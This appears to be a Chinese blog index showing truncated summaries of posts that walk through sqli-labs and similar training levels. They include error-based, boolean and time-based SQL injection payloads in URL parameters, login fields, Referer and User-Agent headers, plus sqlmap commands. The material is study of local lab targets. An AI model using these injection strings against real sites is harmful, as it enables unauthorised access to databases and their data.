摘要： 第二十三关 ......(其实发现好简单的一关) 就是过滤 #和-- http://127.0.0.1/sqli/Less-23/?id=1' and '1'='1 http://127.0.0.1/sqli/Less-23/?id=1' and updatexml(1,concat(0x7e,(s 阅读全文

摘要： 其实漏洞写得很明确了,Referer存在漏洞 Referer:1' and '1'='1--+ Referer:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1 #数据库 Referer:1' and upd 阅读全文

摘要： User-Agent:' or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) , 1, 1) # #版本 User-Agent:' or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) 阅读全文

摘要： uname=admin&passwd=admin' and 1=1#&submit=Submit uname=admin&passwd=admin' and 1=2#&submit=Submit 深刻感受到我没有学到SQL注入的精髓. uname=admin&passwd=admin' order 阅读全文

摘要： sqli-第15关-时间盲注 时间盲注都是用工具的。手工太难了 将请求复制黏贴到txt，文件中 sqlmap -r C:\Users\Administrator\Desktop\post.txt --dbs sqlmap -r C:\Users\Administrator\Desktop\post. 阅读全文

摘要： https://www.mozhe.cn/bug/detail/VlhJTTJsUm9BSmFEQlE3SEpldDBIQT09bW96aGUmozhe 得到信息2条 Deprecated: mysql_connect(): The mysql extension is deprecated and 阅读全文

摘要： 十一关 http://127.0.0.1/sqli/Less-11/ 看到这个页面,添个admin,admin在说. 什么情况,竟然出现这个结果.那么在乱填一个. 明显不一样了.那么我还是抓包处理一下. 抓到包,我们可以尝试重发测试. 看到数据库报错,第一个时间想到这点有漏洞. uname=xxey 阅读全文

摘要： 时间盲注也叫延迟注入 延迟注入,是一种盲注的手法,提交队形时间敏感的函数SQL语句,通过执行时间的长短来判断是否执行成功。 延迟注入的函数 sleep() #时间函数 if(condition,true,false) #条件语句 ascii() #转换成accii码 substring("strin 阅读全文

摘要： 1、深入理解http请求 常用： GET GET方法请求一个指定资源的表示形式。使用GET的请求应该只被用于获取数据。 POST POST方法用于将实体提交到指定的资源，通常导致在服务器上的状态变化或副作用。 我没这么用过的不熟悉的： HEAD HEAD方法请求一个与GET请求的响应相同的响应，但没 阅读全文

摘要： 布尔盲注(基于sqli-labs第八关） 对于盲注只有2种感觉，好玩，好烦。 新技能好玩，一个一个猜好烦。不知道你们是否跟我一样。 手工注入，一个个猜解。大多数人都会觉得特别烦躁的东西。 注入还设有第一点，看注入点在哪里。 个人的查看注入点的方式'单引号，“双引号， http://localhost 阅读全文